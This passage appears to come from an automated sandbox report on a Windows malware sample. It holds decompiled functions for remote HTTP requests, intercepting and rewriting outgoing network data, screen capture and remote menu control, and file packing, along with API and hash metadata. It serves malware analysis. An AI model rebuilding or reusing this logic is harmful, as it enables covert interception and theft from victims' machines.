    										}
    									}
    								}
    							}
    							_t73 = 0;
    							goto L23;
    						}
    					} else {
    						_t60 =  *__ecx ^ 0x07070707;
    						if(_t60 == 0x55425452 || _t60 == 0x54544657) {
    							if(_t71[1] != 0x20) {
    								goto L24;
    							} else {
    								_t61 = 0;
    								_t93 = _t87 + 0xfffffffb;
    								_t84 =  &(_t71[1]);
    								if(_t93 == 0) {
    									goto L51;
    								} else {
    									while(1) {
    										_t79 =  *((intOrPtr*)(_t61 + _t84));
    										if(_t79 == 0xd || _t79 == 0xa) {
    											break;
    										}
    										if(_t79 < 0x20) {
    											goto L51;
    										} else {
    											_t61 = _t61 + 1;
    											if(_t61 < _t93) {
    												continue;
    											} else {
    												break;
    											}
    										}
    										goto L52;
    									}
    									if(_t61 == 0 || _t61 == _t93) {
    										goto L51;
    									} else {
    										_t85 = E004070C5(_t61, 0xfde9, _t84);
    										if(_t85 == 0) {
    											goto L51;
    										} else {
    											_v701 = 0;
    											EnterCriticalSection(0x423fc4);
    											_t94 = E0041A0FD(_a4);
    											if(_t94 != 0) {
    												L18:
    												__eflags =  *_t71 - 0x55;
    												_v701 = 1;
    												if( *_t71 != 0x55) {
    													E00406E85( *((intOrPtr*)(_t94 + 8)));
    													 *((intOrPtr*)(_t94 + 8)) = _t85;
    												} else {
    													E0041A19C(_t94, 1);
    													 *((intOrPtr*)(_t94 + 4)) = _t85;
    												}
    												 *_t94 = _a4;
    											} else {
    												_t94 = E0041A136(_a4);
    												if(_t94 != 0) {
    													goto L18;
    												} else {
    													E00406E85(_t85);
    												}
    											}
    											_t73 = _v701;
    											L23:
    											LeaveCriticalSection(0x423fc4);
    											_t35 = _t73;
    										}
    									}
    								}
    							}
    						} else {
    							goto L24;
    						}
    					}
    				}
    				L52:
    				return _t35;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00423FC4,0000FDE9,?), ref: 0041A2BA
    • LeaveCriticalSection.KERNEL32(00423FC4,?,000000FF), ref: 0041A315
    • EnterCriticalSection.KERNEL32(00423FC4), ref: 0041A330
    • getpeername.WS2_32 ref: 0041A3DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Enter$Leavegetpeername
    • String ID: $ABFS$D$KNTS$RTBU$S^WB$TSFS$U$W$WFTQ$WFTT
    • API String ID: 1099368488-2743420458
    • Opcode ID: 273be7726619fb3d95c607a8581e5f5e9d9de87b76c7e686982a444bd9fc023e
    • Instruction ID: da4530cc666b8b63cfb1580e52453082bcb5bbf274a359cb7135b7414f74040b
    • Opcode Fuzzy Hash: 273be7726619fb3d95c607a8581e5f5e9d9de87b76c7e686982a444bd9fc023e
    • Instruction Fuzzy Hash: 93514731A023459ADF319A64CC897EBB7A05F41714F18452BF8A8A7291C7BDD8E1864F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D5CF(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
    				char _v9;
    				struct HDC__* _v16;
    				char _v20;
    				short _v128;
    				void* _v138;
    				char _v616;
    				char _v897;
    				char _v1392;
    				void* _t60;
    				long _t62;
    				void* _t66;
    				void* _t71;
    				void* _t75;
    				void* _t79;
    				void* _t80;
    				struct HDC__* _t82;
    				int _t85;
    				void* _t87;
    				signed char _t90;
    				void* _t92;
    				void* _t107;
    				struct HDC__* _t108;
    				void* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t120;
    				void** _t124;
    
    				_t124 = __esi;
    				_t120 = __edx;
    				E00406F38(_t60, __esi, 0, 0x18c);
    				_t62 = TlsAlloc();
    				__esi[1] = _t62;
    				if(_t62 != 0xffffffff) {
    					E00412E8D(0x84889911,  &_v128, 0);
    					_t66 = RegisterWindowMessageW( &_v128);
    					__esi[2] = _t66;
    					__eflags = _t66;
    					if(_t66 == 0) {
    						goto L1;
    					}
    					E00412E8D(0x84889912,  &_v128, 1);
    					_t71 = CreateEventW(0x4239a0, 1, 0,  &_v128);
    					__esi[3] = _t71;
    					__eflags = _t71;
    					if(_t71 == 0) {
    						goto L1;
    					}
    					E00412E8D(0x18782822,  &_v128, 1);
    					_t75 = CreateMutexW(0x4239a0, 0,  &_v128);
    					__esi[5] = _t75;
    					__eflags = _t75;
    					if(_t75 == 0) {
    						goto L1;
    					}
    					E00412E8D(0x9878a222,  &_v128, 1);
    					_t79 = CreateFileMappingW(0, 0x4239a0, 4, 0, 0x3d09128,  &_v128);
    					 *__esi = _t79;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						goto L1;
    					}
    					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
    					__eflags = _t80;
    					if(_t80 == 0) {
    						goto L1;
    					}
    					__esi[4] = _t80;
    					__esi[6] = _t80 + 0x128;
    					_v9 = 0;
    					_t82 = GetDC(0);
    					_v16 = _t82;
    					__eflags = _t82;
    					if(_t82 == 0) {
    						L22:
    						return _v9;
    					}
    					__esi[9] = 0;
    					__esi[0xa] = 0;
    					__esi[0xb] = GetDeviceCaps(_t82, 8);
    					_t85 = GetDeviceCaps(_v16, 0xa);
    					_t118 = __esi[0xb];
    					__esi[0xc] = _t85;
    					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t85);
    					if(__eflags == 0) {
    						_t87 = 0;
    						__eflags = 0;
    					} else {
    						_t24 =  &(_t124[8]); // 0x4231d8
    						_t87 = E0040D423(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
    					}
    					_t124[7] = _t87;
    					ReleaseDC(0, _v16);
    					__eflags = _t124[7];
    					if(_t124[7] != 0) {
    						_t119 = _v20;
    						_t90 =  *(_v20 + 0xe) >> 3;
    						_t124[0xe] = _t90;
    						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
    						_t124[0xd] = _t92;
    						__eflags = _t92 & 0x00000003;
    						if((_t92 & 0x00000003) != 0) {
    							_t92 = (_t92 & 0xfffffffc) + 4;
    							__eflags = _t92;
    						}
    						_t124[0xd] = _t92;
    						E00406E85(_t119);
    						__eflags = _a4 - 1;
    						_v9 = 1;
    						if(_a4 != 1) {
    							goto L22;
    						}
    						_v9 = 0;
    						E00413167( &_v1392);
    						E00413194(_t119,  &_v616);
    						_t43 =  &(_t124[0xf]); // 0x4231f4
    						E00406EC1(_t43, 0x423be0, 0x10);
    						_t124[0x13] = _v138;
    						_t47 =  &(_t124[0x14]); // 0x423208
    						E00406EC1(_t47,  &_v897, 0x102);
    						E00412E8D(0x1898b122,  &_v128, 1);
    						_t107 = CreateMutexW(0x4239a0, 0,  &_v128);
    						_t124[0x58] = _t107;
    						__eflags = _t107;
    						if(_t107 == 0) {
    							goto L1;
    						}
    						_t108 = GetDC(0);
    						_a4 = _t108;
    						__eflags = _t108;
    						if(_t108 != 0) {
    							_t109 = CreateCompatibleDC(_t108);
    							_t124[0x55] = _t109;
    							__eflags = _t109;
    							if(_t109 != 0) {
    								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
    								_t124[0x57] = _t111;
    								__eflags = _t111;
    								if(_t111 != 0) {
    									_t112 = SelectObject(_t124[0x55], _t111);
    									_t124[0x56] = _t112;
    									__eflags = _t112;
    									if(_t112 != 0) {
    										_v9 = 1;
    									}
    								}
    							}
    							ReleaseDC(0, _a4);
    						}
    					}
    					goto L22;
    				}
    				L1:
    				return 0;
    			}

    APIs
    • TlsAlloc.KERNEL32(004231B8,00000000,0000018C,00000000,00000000), ref: 0040D5E8
    • RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040D610
    • CreateEventW.KERNEL32(004239A0,00000001,00000000,?,84889912,?,00000001), ref: 0040D63A
    • CreateMutexW.KERNEL32(004239A0,00000000,?,18782822,?,00000001), ref: 0040D65D
    • CreateFileMappingW.KERNEL32(00000000,004239A0,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040D688
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040D69E
    • GetDC.USER32(00000000), ref: 0040D6BB
    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D6DB
    • GetDeviceCaps.GDI32(?,0000000A), ref: 0040D6E5
    • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0040D6F8
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
    • String ID:
    • API String ID: 3765073151-0
    • Opcode ID: bfce9386e0940528a0dee7948d2c2c66ab94cb1a6d8b28debd14d5b6296c4db2
    • Instruction ID: 0de73407e857c23112bc7da6f6d8082cae5c584417578acdcffe7f0afc0fd164
    • Opcode Fuzzy Hash: bfce9386e0940528a0dee7948d2c2c66ab94cb1a6d8b28debd14d5b6296c4db2
    • Instruction Fuzzy Hash: 5F712275900744AFDB20AFB0CD85AAFB7FCEB08344F10483EF956E6291D67995488F25
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041BBDC(intOrPtr* _a4) {
    				char _v532;
    				void* _v536;
    				short _v540;
    				char* _v552;
    				void* _v568;
    				char _v570;
    				char _v572;
    				char _v576;
    				char* _v580;
    				void* _v592;
    				char _v596;
    				char _v600;
    				void* _v620;
    				void* _v624;
    				void* _v628;
    				char* _v632;
    				long _v648;
    				void _v652;
    				intOrPtr _v656;
    				char _v668;
    				intOrPtr _v672;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t53;
    				void* _t56;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    				void* _t94;
    				void* _t99;
    				char* _t101;
    				intOrPtr* _t109;
    				void* _t113;
    				intOrPtr* _t114;
    				signed int _t120;
    				void* _t122;
    
    				_t122 = (_t120 & 0xfffffff8) - 0x224;
    				_t109 = _a4;
    				if(E0040B8E3( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
    					L25:
    					return 0;
    				}
    				_t53 = InternetOpenA( *0x423bdc, 0, 0, 0, 0);
    				_v536 = _t53;
    				if(_t53 == 0) {
    					L24:
    					E00406E85(_v552);
    					E00406E85(_v552);
    					goto L25;
    				}
    				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
    				_v592 = _t56;
    				if(_t56 == 0) {
    					L23:
    					InternetCloseHandle(_v568);
    					goto L24;
    				}
    				_t58 =  *_t109;
    				_t101 = "POST";
    				if( *((char*)(_t58 + 0x18)) != 1) {
    					_t101 = "GET";
    				}
    				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
    				_v620 = _t99;
    				if(_t99 == 0) {
    					L22:
    					InternetCloseHandle(_v624);
    					goto L23;
    				} else {
    					E00413194(_t101,  &_v576);
    					_t63 = 0xe;
    					E00405ACA(_t63,  &_v600);
    					_t66 =  *_a4;
    					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
    						_t94 = E00407C49( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
    						_t122 = _t122 + 0xc;
    						if(_t94 > 0) {
    							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
    							E00406E85(_v648);
    						}
    					}
    					_t67 = 0xf;
    					E00405ACA(_t67,  &_v596);
    					_v628 = E004079D4( &_v572);
    					_t113 = E00406E55(2 + _t69 * 6);
    					if(_t113 == 0) {
    						_t113 = 0;
    					} else {
    						E0040BC0E(_t113,  &_v572, _v628);
    						_t99 = _v628;
    					}
    					if(_t113 != 0 && E00407C49( &_v632,  &_v596, _t113) > 0) {
    						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
    						E00406E85(_v648);
    					}
    					E00406E85(_t113);
    					_t114 = _a4;
    					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
    						L21:
    						InternetCloseHandle(_t99);
    						goto L22;
    					} else {
    						_v648 = 4;
    						_v652 = 0;
    						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
    							goto L21;
    						} else {
    							if(E00408FBB( &_v668, _t99) != 0) {
    								E00406E85(_t80);
    							}
    							E00406E85(_v656);
    							E00406E85(_v656);
    							 *((intOrPtr*)(_t114 + 8)) = _v668;
    							goto L25;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 0040B8E3: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040B912
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 0041BC0E
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0041BC2F
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 0041BC7E
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0041BCD5
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0041BD4D
    • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0041BD70
    • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 0041BD98
    • InternetCloseHandle.WININET(00000000), ref: 0041BDDD
    • InternetCloseHandle.WININET(?), ref: 0041BDE7
      • Part of subcall function 00408FBB: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00408FCF
      • Part of subcall function 00408FBB: GetLastError.KERNEL32 ref: 00408FD9
      • Part of subcall function 00408FBB: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00408FF9
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    • InternetCloseHandle.WININET(?), ref: 0041BDF1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 1023423486-2753618334
    • Opcode ID: 487fc3c26fcb4dfd2ebaa0128b8b281cf6090dc0e5ef58fab099692fb9f58664
    • Instruction ID: 134c6eefd1a62be821ea51e9f4bc80226959fb5ad9129c078edb6177a5325499
    • Opcode Fuzzy Hash: 487fc3c26fcb4dfd2ebaa0128b8b281cf6090dc0e5ef58fab099692fb9f58664
    • Instruction Fuzzy Hash: F651BE72104311AFC711AF61DC49E9FBFA9EF84354F00092AF549A21B2DB38D994CBD9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0040DB06(unsigned int __ecx, signed int __edx, struct HWND__* _a4, signed short _a8) {
    				struct tagRECT _v20;
    				signed int _v24;
    				int _v28;
    				signed short _t40;
    				int _t49;
    				BYTE* _t50;
    				signed short _t54;
    				int _t66;
    				int _t67;
    				unsigned int _t68;
    				signed int _t70;
    				struct HMENU__* _t74;
    				struct HMENU__* _t78;
    				void* _t82;
    
    				_t70 = __edx;
    				_t68 = __ecx;
    				_t40 = _a8;
    				_t82 = _t40 - 0xfffffffd;
    				if(_t82 == 0) {
    					SetKeyboardState( *0x4231c8);
    				} else {
    					if(_t82 <= 0 || _t40 > 0xffffffff) {
    						_v20.top = _t40 >> 0x10;
    						_v20.right = _t68 & 0x0000ffff;
    						_v20.left = _t40 & 0x0000ffff;
    						_v20.bottom = _t68 >> 0x10;
    						E004050A4( &_v20, _t68 >> 0x10, _t40 & 0x0000ffff, 0x4231b8, _a4, 0);
    					} else {
    						_t74 = GetMenu(_a4);
    						if(_t74 != 0) {
    							_v24 = _v24 | 0xffffffff;
    							_t49 = GetMenuItemCount(_t74);
    							_t66 = 0;
    							_v28 = _t49;
    							if(_t49 > 0) {
    								do {
    									if(GetMenuState(_t74, _t66, 0x400) < 0) {
    										HiliteMenuItem(_a4, _t74, _t66, 0x400);
    										_v24 = _t66;
    									}
    									_t66 = _t66 + 1;
    								} while (_t66 < _v28);
    							}
    							_t50 =  *0x4231c8;
    							_push(_t50[0x104]);
    							_t67 = MenuItemFromPoint(_a4, _t74, _t50[0x100]);
    							if(_t67 != 0xffffffff) {
    								_v28 = GetMenuState(_t74, _t67, 0x400);
    								if(_v24 != _t67) {
    									EndMenu();
    								}
    								HiliteMenuItem(_a4, _t74, _t67, 0x480);
    								if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
    									if((_v28 & 0x00000010) == 0) {
    										if((_v28 & 0x00000800) == 0) {
    											_t54 = GetMenuItemID(_t74, _t67);
    											asm("clc");
    											_push( *((intOrPtr*)(_t67 + 0x6a + _t70 * 2)));
    										} else {
    											_t54 = 0;
    											SendMessageW(_a4, 0x111, _t54 & 0x0000ffff, 0);
    										}
    									} else {
    										_t78 = GetSubMenu(_t74, _t67);
    										if(_t78 != 0 && GetMenuItemRect(_a4, _t74, _t67,  &_v20) != 0) {
    											TrackPopupMenuEx(_t78, 0x4000, _v20, _v20.bottom, _a4, 0);
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				SetEvent( *0x4231c4);
    				return 0;
    			}

    APIs
    • GetMenu.USER32(?), ref: 0040DB30
    • GetMenuItemCount.USER32 ref: 0040DB46
    • GetMenuState.USER32 ref: 0040DB5E
    • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0040DB6E
    • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040DB94
    • GetMenuState.USER32 ref: 0040DBA8
    • EndMenu.USER32 ref: 0040DBB8
    • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0040DBC8
    • GetSubMenu.USER32 ref: 0040DBEC
    • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0040DC06
    • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0040DC27
    • GetMenuItemID.USER32(00000000,00000000), ref: 0040DC3F
    • SendMessageW.USER32(?,00000111,?,00000000), ref: 0040DC58
    • SetKeyboardState.USER32 ref: 0040DC97
    • SetEvent.KERNEL32(?,?,00402552), ref: 0040DCA3
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
    • String ID:
    • API String ID: 751066993-0
    • Opcode ID: 7fb16fb35eb743de3f013154809fff89da8ef4b5d953ea6eb8393a78f26dde0c
    • Instruction ID: cac4b9055081532a1f2828579c1406573ab48b4e68c79266e391809770bc935f
    • Opcode Fuzzy Hash: 7fb16fb35eb743de3f013154809fff89da8ef4b5d953ea6eb8393a78f26dde0c
    • Instruction Fuzzy Hash: 7141D030408304ABE7118F64CD8CE7B7AB8EF85764F00063AF966B21F0C3748959DB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040AB6B() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t7;
    				void* _t9;
    				intOrPtr _t16;
    				intOrPtr _t18;
    
    				if( *0x4231b4 != 0) {
    					L9:
    					 *0x4231b4 =  *0x4231b4 + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x4231b0 = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x4227dc = GetProcAddress(_t2, "FCICreate");
    						 *0x4231a0 = GetProcAddress( *0x4231b0, "FCIAddFile");
    						 *0x4223d4 = GetProcAddress( *0x4231b0, "FCIFlushCabinet");
    						_t7 = GetProcAddress( *0x4231b0, "FCIDestroy");
    						 *0x4231a8 = _t7;
    						_t16 =  *0x4227dc; // 0x0
    						if(_t16 == 0 ||  *0x4231a0 == 0) {
    							L7:
    							FreeLibrary( *0x4231b0);
    							goto L8;
    						} else {
    							_t18 =  *0x4223d4; // 0x0
    							if(_t18 == 0 || _t7 == 0) {
    								goto L7;
    							} else {
    								_t9 = HeapCreate(0, 0x80000, 0);
    								 *0x4223d0 = _t9;
    								if(_t9 != 0) {
    									goto L9;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040AC52,?,0040AE6E,?), ref: 0040AB7F
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040AB9F
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 0040ABB1
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040ABC3
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 0040ABD5
    • HeapCreate.KERNEL32(00000000,00080000,00000000,?,0040AE6E,?), ref: 0040AC00
    • FreeLibrary.KERNEL32(?,0040AE6E,?), ref: 0040AC15
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: 850c90fa2e0d931371594381f52391f9b96bf394930eef595b254d1873ee2fbb
    • Instruction ID: cf1ff3ff92bc6435ce4fb492c108862add0fd3f44ece2d07d5a333dd1c49fbd8
    • Opcode Fuzzy Hash: 850c90fa2e0d931371594381f52391f9b96bf394930eef595b254d1873ee2fbb
    • Instruction Fuzzy Hash: 7A110C70B48350AFDB325F25BE089263AB5F2897523A5057BE600A22B4E77D05A2CF4D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00415321(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v56;
    				signed int _v72;
    				char _v76;
    				signed int _v80;
    				signed int _v84;
    				signed char _v88;
    				signed int _v92;
    				signed int _v100;
    				intOrPtr _v104;
    				signed int _v108;
    				intOrPtr _v128;
    				void* __esi;
    				signed int _t111;
    				signed int _t113;
    				signed char _t114;
    				signed int _t115;
    				void* _t117;
    				signed char _t121;
    				signed int _t122;
    				signed int _t125;
    				signed int _t128;
    				signed char _t130;
    				signed char _t136;
    				intOrPtr _t149;
    				void* _t165;
    				signed char _t166;
    				void* _t172;
    				intOrPtr _t178;
    				signed int _t184;
    				void* _t186;
    				void* _t188;
    				signed int _t202;
    				signed int _t203;
    
    				if(E00412FEE() == 0 || _a8 == 0 || _a12 <= 0) {
    					L9:
    					_t111 =  *0x423964(_a4, _a8, _a12);
    					goto L10;
    				} else {
    					EnterCriticalSection(0x423e40);
    					_t192 = _a4;
    					_t184 = E004143A5(_a4);
    					_v84 = _t184;
    					if(_t184 == 0xffffffff) {
    						L8:
    						LeaveCriticalSection(0x423e40);
    						goto L9;
    					}
    					_t186 = _t184 * 0x38 +  *0x423e5c;
    					if( *(_t186 + 0x20) > 0) {
    						L29:
    						_t113 =  *(_t186 + 0x24);
    						_t188 =  *(_t186 + 0x20) - _t113;
    						LeaveCriticalSection(0x423e40);
    						_t195 = _a4;
    						_t114 =  *0x423964(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
    						_v88 = _t114;
    						__eflags = _t114 - 0xffffffff;
    						if(_t114 != 0xffffffff) {
    							EnterCriticalSection(0x423e40);
    							_t115 = E004143A5(_t195);
    							__eflags = _t115 - 0xffffffff;
    							if(_t115 != 0xffffffff) {
    								_t166 = _v88;
    								_t117 = _t115 * 0x38 +  *0x423e5c;
    								__eflags = _t166 - _t188;
    								if(_t166 != _t188) {
    									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
    									_t92 = _t117 + 0x28;
    									 *_t92 =  *(_t117 + 0x28) - 1;
    									__eflags =  *_t92;
    									_v88 = 1;
    								} else {
    									_t88 = _t117 + 0x1c; // -4341312
    									_v88 =  *(_t117 + 0x28);
    									E00406F38(E00406E85( *_t88), _t88, 0, 0x10);
    								}
    							} else {
    								_v88 = _v88 | _t115;
    								 *0x423e3c(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x423e40);
    						}
    						L36:
    						_t111 = _v88;
    						L10:
    						return _t111;
    					}
    					if( *(_t186 + 8) > 0) {
    						L38:
    						LeaveCriticalSection(0x423e40);
    						_t197 = _a4;
    						_t121 =  *0x423964(_a4, _a8, _a12);
    						_v88 = _t121;
    						__eflags = _t121 - 0xffffffff;
    						if(_t121 != 0xffffffff) {
    							EnterCriticalSection(0x423e40);
    							_t122 = E004143A5(_t197);
    							__eflags = _t122 - 0xffffffff;
    							if(_t122 != 0xffffffff) {
    								_t172 = _t122 * 0x38 +  *0x423e5c;
    								_t178 =  *((intOrPtr*)(_t172 + 8));
    								__eflags = _v88 - _t178;
    								if(_v88 > _t178) {
    									E00414463(_t122);
    								} else {
    									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
    								}
    							} else {
    								_v88 = _v88 | _t122;
    								 *0x423e3c(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x423e40);
    						}
    						goto L36;
    					}
    					_t125 = E00414899( &_v76, _t192, _a8, _a12);
    					_v92 = _t125;
    					if(_t125 != 0xffffffff) {
    						__eflags = _v72;
    						if(_v72 == 0) {
    							L37:
    							E0041BB4F( &_v76);
    							_t128 = _v80 + _a12;
    							__eflags = _t128;
    							 *(_t186 + 8) = _t128;
    							goto L38;
    						}
    						_t130 = E0041B221( &_v76);
    						_v88 = _t130;
    						__eflags = _t130 & 0x00000001;
    						if((_t130 & 0x00000001) == 0) {
    							_v92 = 0;
    							_v88 = 0;
    							__eflags = _t130 & 0x00000002;
    							if(__eflags != 0) {
    								_t203 = E00406ED8(__eflags, _a8, _a12);
    								_v100 = _t203;
    								__eflags = _t203;
    								if(_t203 != 0) {
    									E0041BBB9( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
    									E00406E85( *(_t186 + 0x14));
    									E00406E85( *((intOrPtr*)(_t186 + 4)));
    									_t149 = E004072E3(_v76, _v80);
    									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
    									_t38 = _t186 + 0x18;
    									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
    									__eflags =  *_t38;
    									 *((intOrPtr*)(_t186 + 4)) = _t149;
    									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
    									 *((intOrPtr*)(_t186 + 0x10)) = _v32;
    									_v128 = E0040BDAC(E0040BDAC(E0040BE28(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
    								} else {
    									E0041BBB9(_v16, _v20);
    								}
    							}
    							__eflags = _v84 & 0x00000004;
    							if((_v84 & 0x00000004) == 0) {
    								L27:
    								__eflags = _v92;
    								if(_v92 == 0) {
    									goto L37;
    								}
    								E0041BB4F( &_v76);
    								_t70 = _t186 + 0x24;
    								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
    								__eflags =  *_t70;
    								 *(_t186 + 8) = _v80;
    								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
    								 *(_t186 + 0x20) = _v88;
    								 *(_t186 + 0x28) = _a12;
    								goto L29;
    							}
    							_t202 = _v92;
    							__eflags = _t202;
    							if(__eflags != 0) {
    								_t136 = _v88;
    							} else {
    								_t202 = _a8;
    								_t136 = _a12;
    							}
    							_v84 = _t136;
    							_v104 = E00414B79(_v84, __eflags, _t202, _v40, _v36,  &_v92);
    							E00406E85(_v56);
    							__eflags = _v108;
    							if(_v108 != 0) {
    								__eflags = _t202 - _a8;
    								if(_t202 != _a8) {
    									E00406E85(_t202);
    								}
    							} else {
    								__eflags = _t202 - _a8;
    								if(_t202 == _a8) {
    									goto L37;
    								}
    								_v92 = _t202;
    								_v88 = _v84;
    							}
    							goto L27;
    						} else {
    							E0041BB4F( &_v76);
    							LeaveCriticalSection(0x423e40);
    							_t111 =  *0x423e3c(0xffffe8a3, 0) | 0xffffffff;
    							goto L10;
    						}
    					} else {
    						E00414463(_v84);
    						E0041BB4F( &_v76);
    						goto L8;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • EnterCriticalSection.KERNEL32(00423E40), ref: 00415348
